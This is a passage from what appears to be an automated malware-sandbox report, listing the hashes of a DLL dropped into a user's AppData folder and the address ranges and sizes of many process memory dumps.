SHA5125cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1
-
C:\Users\Admin\AppData\Roaming\nsis_unse5708f9.dllFilesize
49KB
MD5832890fded186835970d1d3302590138
SHA15385703e9dcde43e60928b2e9c941b7232468a6a
SHA256438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576
SHA5125cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1
-
memory/260-218-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/260-166-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/260-163-0x0000000000000000-mapping.dmp
-
memory/380-281-0x0000000000000000-mapping.dmp
-
memory/392-195-0x0000000000000000-mapping.dmp
-
memory/432-275-0x00000000020F0000-0x000000000213B000-memory.dmpFilesize
300KB
-
memory/432-200-0x0000000000000000-mapping.dmp
-
memory/432-277-0x0000000000400000-0x000000000047D000-memory.dmpFilesize
500KB
-
memory/432-274-0x00000000006D8000-0x0000000000707000-memory.dmpFilesize
188KB
-
memory/604-384-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/604-382-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/628-132-0x0000000000000000-mapping.dmp
-
memory/872-136-0x0000000000000000-mapping.dmp
-
memory/876-196-0x0000000000000000-mapping.dmp
-
memory/992-239-0x0000000000000000-mapping.dmp
-
memory/1020-315-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1020-313-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1020-318-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1020-312-0x0000000000000000-mapping.dmp
-
memory/1020-323-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1056-266-0x0000000000000000-mapping.dmp
-
memory/1268-321-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/1268-249-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/1268-258-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/1268-241-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/1268-244-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/1268-240-0x0000000000000000-mapping.dmp
-
memory/1524-231-0x0000000000000000-mapping.dmp
-
memory/1620-423-0x00000000046D0000-0x0000000004810000-memory.dmpFilesize
1.2MB
-
memory/1620-419-0x00000000046D0000-0x0000000004810000-memory.dmpFilesize
1.2MB
-
memory/1620-415-0x0000000003A70000-0x00000000045C1000-memory.dmpFilesize
11.3MB
-
memory/1620-420-0x00000000046D0000-0x0000000004810000-memory.dmpFilesize
1.2MB
-
memory/1620-418-0x00000000046D0000-0x0000000004810000-memory.dmpFilesize
1.2MB
-
memory/1620-421-0x00000000046D0000-0x0000000004810000-memory.dmpFilesize
1.2MB
-
memory/1620-233-0x0000000000000000-mapping.dmp
-
memory/1620-422-0x00000000046D0000-0x0000000004810000-memory.dmpFilesize
1.2MB
-
memory/1620-417-0x0000000003A70000-0x00000000045C1000-memory.dmpFilesize
11.3MB
-
memory/1772-140-0x0000000000000000-mapping.dmp
-
memory/1976-229-0x0000000000000000-mapping.dmp
-
memory/2128-142-0x0000000000000000-mapping.dmp
-
memory/2220-386-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/2220-388-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/2220-387-0x0000000000400000-0x0000000000471000-memory.dmpFilesize
452KB
-
memory/2288-198-0x0000000000000000-mapping.dmp
-
memory/2332-199-0x0000000000000000-mapping.dmp
-
memory/2332-290-0x000000000E590000-0x000000000E9E3000-memory.dmpFilesize
4.3MB
-
memory/2332-232-0x000000000E590000-0x000000000E9E3000-memory.dmpFilesize
4.3MB
-
memory/2332-230-0x000000000E590000-0x000000000E9E3000-memory.dmpFilesize
4.3MB
-
memory/2332-228-0x0000000002DB0000-0x0000000002F4C000-memory.dmpFilesize
1.6MB
-
memory/2332-283-0x0000000002DB0000-0x0000000002F4C000-memory.dmpFilesize
1.6MB
-
memory/2376-348-0x000000004ABD0000-0x000000004AC62000-memory.dmpFilesize
584KB
-
memory/2376-269-0x0000000000000000-mapping.dmp
-
memory/2588-263-0x0000000000000000-mapping.dmp
-
memory/2656-325-0x0000000000000000-mapping.dmp
-
memory/2708-317-0x0000000000000000-mapping.dmp
-
memory/2708-324-0x00000000045A0000-0x00000000045D6000-memory.dmpFilesize
216KB
-
memory/2708-333-0x0000000004C90000-0x0000000004CB2000-memory.dmpFilesize
136KB
-
memory/2708-328-0x0000000004CF0000-0x0000000005318000-memory.dmpFilesize
6.2MB
-
memory/2720-212-0x0000000000000000-mapping.dmp
-
memory/2908-190-0x0000000000000000-mapping.dmp
-
memory/2908-193-0x0000000000FA0000-0x0000000000FD2000-memory.dmpFilesize
200KB
-
memory/2948-300-0x0000000000000000-mapping.dmp
-
memory/2948-309-0x000001E6AC770000-0x000001E6AC777000-memory.dmpFilesize
28KB
-
memory/2948-310-0x00007FF433120000-0x00007FF43321A000-memory.dmpFilesize
1000KB
-
memory/3020-250-0x0000000000000000-mapping.dmp
-
memory/3120-257-0x0000000140000000-0x000000014061A000-memory.dmpFilesize
6.1MB
-
memory/3120-254-0x0000000000000000-mapping.dmp
-
memory/3168-177-0x0000000000000000-mapping.dmp
-
memory/3200-322-0x0000000000400000-0x000000000047D000-memory.dmpFilesize
500KB
-
memory/3200-160-0x0000000000000000-mapping.dmp
-
memory/3200-174-0x00000000005B8000-0x00000000005E6000-memory.dmpFilesize
184KB
-
memory/3200-320-0x00000000005B8000-0x00000000005E6000-memory.dmpFilesize
184KB
-
memory/3200-173-0x0000000004C60000-0x0000000005204000-memory.dmpFilesize
5.6MB
-
memory/3200-175-0x0000000002080000-0x00000000020CB000-memory.dmpFilesize
300KB
-
memory/3200-176-0x0000000000400000-0x000000000047D000-memory.dmpFilesize
500KB
-
memory/3200-246-0x00000000005B8000-0x00000000005E6000-memory.dmpFilesize
184KB
-
memory/3232-167-0x0000000000000000-mapping.dmp
-
memory/3232-213-0x0000000007710000-0x0000000007C3C000-memory.dmpFilesize
5.2MB
-
memory/3232-211-0x0000000007010000-0x00000000071D2000-memory.dmpFilesize
1.8MB
-
memory/3232-216-0x0000000006EF0000-0x0000000006F66000-memory.dmpFilesize
472KB
-
memory/3232-217-0x0000000006F70000-0x0000000006FC0000-memory.dmpFilesize
320KB
-
memory/3264-183-0x0000000000000000-mapping.dmp
-
memory/3288-338-0x0000000000000000-mapping.dmp
-
memory/3328-219-0x0000000000000000-mapping.dmp
-
memory/3340-327-0x0000000000000000-mapping.dmp
-
memory/3348-151-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/3348-194-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/3348-373-0x0000000000000000-mapping.dmp
-
memory/3348-148-0x0000000000000000-mapping.dmp
-
memory/3376-180-0x0000000000000000-mapping.dmp
-
memory/3380-337-0x0000000000000000-mapping.dmp
-
memory/3456-279-0x0000000000000000-mapping.dmp
-
memory/3504-141-0x0000000000000000-mapping.dmp
-
memory/3724-438-0x0000015DF3480000-0x0000015DF34A0000-memory.dmpFilesize
128KB
-
memory/3876-311-0x0000000000000000-mapping.dmp
-
memory/3948-425-0x0000019882A00000-0x0000019882B40000-memory.dmpFilesize
1.2MB
-
memory/3948-424-0x0000019882A00000-0x0000019882B40000-memory.dmpFilesize
1.2MB
-
memory/3952-236-0x0000000000751000-0x0000000000753000-memory.dmpFilesize
8KB
-
memory/3952-222-0x0000000000000000-mapping.dmp
-
memory/3952-238-0x0000000002350000-0x0000000003350000-memory.dmpFilesize
16.0MB
-
memory/3952-237-0x0000000000580000-0x000000000059D000-memory.dmpFilesize
116KB
-
memory/3952-287-0x0000000000580000-0x000000000059D000-memory.dmpFilesize
116KB
-
memory/4124-159-0x0000000004DC0000-0x0000000004DFC000-memory.dmpFilesize
240KB
-
memory/4124-188-0x0000000005CC0000-0x0000000005D52000-memory.dmpFilesize
584KB
-
memory/4124-152-0x0000000000000000-mapping.dmp
-
memory/4124-155-0x00000000003A0000-0x00000000003D2000-memory.dmpFilesize
200KB
-
memory/4124-185-0x00000000050F0000-0x0000000005156000-memory.dmpFilesize
408KB
-
memory/4124-156-0x00000000052B0000-0x00000000058C8000-memory.dmpFilesize
6.1MB
-
memory/4124-157-0x0000000004E30000-0x0000000004F3A000-memory.dmpFilesize
1.0MB
-
memory/4124-158-0x0000000004D60000-0x0000000004D72000-memory.dmpFilesize
72KB
-
memory/4128-288-0x0000000000000000-mapping.dmp
-
memory/4148-187-0x0000000000000000-mapping.dmp
-
memory/4204-289-0x0000000000000000-mapping.dmp
-
memory/4320-186-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/4320-147-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/4320-146-0x0000000000E00000-0x0000000000E0A000-memory.dmpFilesize
40KB
-
memory/4320-143-0x0000000000000000-mapping.dmp
-
memory/4408-243-0x0000000000000000-mapping.dmp
-
memory/4408-319-0x0000000002240000-0x000000000235B000-memory.dmpFilesize
1.1MB
-
memory/4408-316-0x00000000020A2000-0x0000000002133000-memory.dmpFilesize
580KB
-
memory/4428-294-0x0000000000000000-mapping.dmp
-
memory/4428-299-0x0000000000400000-0x0000000000558000-memory.dmpFilesize
1.3MB
-
memory/4528-272-0x0000000000FB5000-0x0000000000FB7000-memory.dmpFilesize
8KB
-
memory/4528-252-0x0000000000B60000-0x0000000000B95000-memory.dmpFilesize
212KB
-
memory/4528-253-0x0000000000000000-mapping.dmp
-
memory/4528-278-0x0000000000F10000-0x0000000000F2D000-memory.dmpFilesize
116KB
-
memory/4528-260-0x0000000000B60000-0x0000000000B95000-memory.dmpFilesize
212KB
-
memory/4528-276-0x0000000000B60000-0x0000000000B95000-memory.dmpFilesize
212KB
-
memory/4600-138-0x0000000000000000-mapping.dmp
-
memory/4636-137-0x0000000000000000-mapping.dmp
-
memory/4660-139-0x0000000000000000-mapping.dmp
-
memory/4740-210-0x0000000000630000-0x0000000000662000-memory.dmpFilesize
200KB
-
memory/4740-206-0x0000000000000000-mapping.dmp
-
memory/4784-335-0x0000000000000000-mapping.dmp
-
memory/4824-197-0x0000000000000000-mapping.dmp
-
memory/4844-286-0x0000000000400000-0x000000000046F000-memory.dmpFilesize
444KB
-
memory/4844-295-0x0000000000690000-0x00000000006AD000-memory.dmpFilesize
116KB
-
memory/4844-225-0x0000000000000000-mapping.dmp
-
memory/4844-331-0x00000000006F8000-0x0000000000719000-memory.dmpFilesize
132KB
-
memory/4844-330-0x000000000071D000-0x000000000072E000-memory.dmpFilesize
68KB
-
memory/4844-329-0x0000000000400000-0x000000000046F000-memory.dmpFilesize
444KB
-
memory/4844-284-0x00000000006F8000-0x0000000000719000-memory.dmpFilesize
132KB
-
memory/4844-285-0x00000000004E0000-0x0000000000505000-memory.dmpFilesize
148KB
-
memory/4844-292-0x000000000071D000-0x000000000072E000-memory.dmpFilesize
68KB
-
memory/4844-332-0x0000000000690000-0x00000000006AD000-memory.dmpFilesize
116KB
-
memory/4888-189-0x0000000000000000-mapping.dmp
-
memory/4964-135-0x0000000000000000-mapping.dmp
-
memory/4976-205-0x0000000000658000-0x0000000000687000-memory.dmpFilesize
188KB
-
memory/4976-207-0x0000000000400000-0x000000000047D000-memory.dmpFilesize
500KB
-
memory/4976-170-0x0000000000000000-mapping.dmp
-
memory/4976-273-0x0000000000658000-0x0000000000687000-memory.dmpFilesize
188KB
-
memory/5004-307-0x0000000000000000-mapping.dmp
-
memory/5044-308-0x0000000000000000-mapping.dmp
-
memory/5052-184-0x0000000000000000-mapping.dmp
-
memory/5108-368-0x0000000000000000-mapping.dmp